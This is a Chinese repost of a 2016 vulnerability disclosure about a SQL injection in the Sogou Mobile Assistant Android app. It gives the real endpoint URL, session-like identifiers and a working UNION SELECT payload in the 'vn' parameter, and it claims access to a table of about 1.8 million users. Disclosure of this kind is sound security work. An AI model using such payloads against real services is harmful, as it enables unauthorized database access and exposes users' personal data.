记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

搜狗手机助手APP一处SQL注入(涉及近180W+用户数据)

2016-06-28 19:55

目标:搜狗手机助手Android APP

检测发现以下地方存在SQL注入:(注入参数vn,union query)

code 区域
http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=42&uid=ed83a60cea765d52e3c2ced557270c62&vn=1&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&cellid=cdma_13844_19857_2&sc=0



Payload:(返回搜一下1111111111~~)

code 区域
http://mobile.zhushou.sogou.com/android/serverconfig.html?iv=42&uid=ed83a60cea765d52e3c2ced557270c62&vn=1%27%20union%20select%201111111111111,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20--%20-&channel=A33003001&sogouid=adbb0fa5168d72223c5e5ca8fb853a8a&stoken==R1fTz7EJBVCutv3iFzOUFg&cellid=cdma_13844_19857_2&sc=0

漏洞证明:

1、当前数据库用户

user.jpg



2、所有数据库

dbs.jpg



3、用户表,涉及近180W+用户数据

tb.jpg

修复方案:

请多指教~

知识来源: www.wooyun.org/bugs/wooyun-2016-0207271

阅读:76556 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狗手机助手APP一处SQL注入(涉及近180W+用户数据)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云